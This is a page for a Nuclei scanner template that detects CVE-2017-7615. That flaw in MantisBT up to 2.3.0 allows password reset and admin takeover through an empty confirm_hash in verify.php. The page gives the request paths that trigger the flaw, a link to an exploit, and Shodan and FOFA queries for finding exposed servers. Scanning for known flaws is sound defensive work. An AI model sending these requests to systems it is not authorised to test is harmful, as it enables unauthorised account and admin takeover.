Skip to content
Nuclei Templates

MantisBT <=2.30 - Arbitrary Password Reset/Admin Access

ID: CVE-2017-7615

Severity: high

Author: bp0lr,dwisiswant0

Tags: cve,cve2017,mantisbt,unauth,edb

Description

Section titled “Description”

MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.

YAML Source

Section titled “YAML Source”
id: CVE-2017-7615


# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.
# This template works by guessing user ID.
# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].
info:
  name: MantisBT <=2.30 - Arbitrary Password Reset/Admin Access
  author: bp0lr,dwisiswant0
  severity: high
  description: |
    MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized password resets and unauthorized administrative access.
  remediation: |
    Upgrade MantisBT to a version higher than 2.30 to mitigate this vulnerability.
  reference:
    - https://sourceforge.net/projects/mantisbt/files/mantis-stable/
    - http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
    - https://www.exploit-db.com/exploits/41890
    - http://www.openwall.com/lists/oss-security/2017/04/16/2
    - https://nvd.nist.gov/vuln/detail/CVE-2017-7615
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2017-7615
    cwe-id: CWE-640
    epss-score: 0.97404
    epss-percentile: 0.99923
    cpe: cpe:2.3:a:mantisbt:mantisbt:*:*:*:*:*:*:*:*
  metadata:
    max-request: 5
    vendor: mantisbt
    product: mantisbt
    shodan-query:
      - http.favicon.hash:662709064
      - cpe:"cpe:2.3:a:mantisbt:mantisbt"
    fofa-query: icon_hash=662709064
  tags: cve,cve2017,mantisbt,unauth,edb


http:
  - method: GET
    path:
      - "{{BaseURL}}/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
      - "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""


      - type: status
        status:
          - 200
# digest: 4a0a00473045022011d60284f63fcd0f3c7e6707492f665f4b1a52793a2f47c088fafcc937deb43d022100d744faaeb587b997408de4b992b39dbd75ecd497555986dad5ee7daa62c9315c:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-7615.yaml"

View on Github